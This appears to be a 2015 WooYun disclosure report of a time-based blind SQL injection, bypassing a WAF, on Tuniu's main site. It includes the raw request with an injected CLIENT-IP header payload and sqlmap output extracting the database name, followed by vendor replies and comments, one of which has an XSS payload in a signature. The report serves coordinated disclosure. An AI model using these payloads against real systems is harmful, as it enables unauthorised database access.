当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122321

漏洞标题:途牛旅游网主站SQL时间盲注+无视WAF

相关厂商:途牛旅游网

漏洞作者: Jannock

提交时间:2015-06-23 17:29

修复时间:2015-08-07 17:54

公开时间:2015-08-07 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

途牛旅游网主站SQL时间盲注+无视WAF。
PS:waf越做越变态了。

详细说明:

GET /Partner_redirect.php HTTP/1.1
Host: www.tuniu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CLIENT-IP: 127.0.0.1'+if((1=1 * ),(select 1 from information_schema.tables),(select 1 from information_schema.tables))+'
Content-Length: 0
Connection: close

漏洞证明:

python sqlmap.py -r 1.txt --dbms=mysql --technique=T
--current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:18:43
[17:18:43] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '--headers/--user-agent
/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[17:18:44] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.tuniu.com'. Do you want to follow? [Y/n
] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) HEADER
Parameter: CLIENT-IP #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: 127.0.0.1'+if((1=1 ) AND SLEEP(5) AND (4256=4256 ),(select 1 from i
nformation_schema.tables),(select 1 from information_schema.tables))+'
---
[17:18:50] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[17:19:03] [INFO] confirming MySQL
[17:19:03] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[17:19:13] [INFO] adjusting time delay to 1 second due to good response times
[17:19:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[17:19:13] [INFO] fetching current database
[17:19:13] [INFO] retrieved: tuniu
current database: 'tuniu'


1.png

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-23 17:53

厂商回复:

谢谢一哥关注途牛安全,我们正在紧急修复,啥都不说了。。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-23 17:31 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    一哥NB

  2. 2015-06-23 17:31 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    哈哈哈,关注

  3. 2015-06-23 17:35 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    只是想不想发的问题

  4. 2015-06-23 17:35 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    顶一哥

  5. 2015-06-23 17:35 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    前些日子找一哥光顾的各大厂商,一哥说回头一个一个补上。

  6. 2015-06-23 17:35 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

    关注,一哥的注入

  7. 2015-06-23 17:37 | 途牛旅游网(乌云厂商)

    一哥别忘记我,洗好等你哟!(✿◡‿◡)

  8. 2015-06-23 17:37 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @途牛旅游网 哈哈,节操碎了。

  9. 2015-06-23 17:41 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    一个个补上

  10. 2015-06-23 17:44 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    一哥NB

  11. 2015-06-23 17:54 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    一哥屌屌的!

  12. 2015-06-23 17:57 | 途牛旅游网(乌云厂商)

    @途牛旅游网 哪来的泼猴,竟敢冒充我!

  13. 2015-06-23 18:20 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    @途牛旅游网 哪来的泼猴,竟敢冒充我!

  14. 2015-06-23 20:13 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    @途牛旅游网 哪来的泼猴 竟敢冒充我

  15. 2015-06-23 20:24 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @途牛旅游网 你们不是一个人么,

  16. 2015-06-23 20:51 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @途牛旅游网 一定是精神分裂症了

  17. 2015-06-23 21:58 | 0c0c0f ( 实习白帽子 | Rank:48 漏洞数:15 | My H34rt c4n 3xploit 4ny h0les!)

    @途牛旅游网 哪来的泼猴 竟敢冒充我

  18. 2015-06-24 07:36 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    希望没重复

  19. 2015-07-09 11:35 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

    还不公开给看看啊

  20. 2015-08-07 18:53 | 鹤冲天 ( 路人 | Rank:1 漏洞数:1 | 哎~)

    @途牛旅游网 你名字后面大大的(乌云厂商)暴露了你是一个人,精神分裂无疑,。。。一定是厂商发现删不掉回复才。。。@DloveJ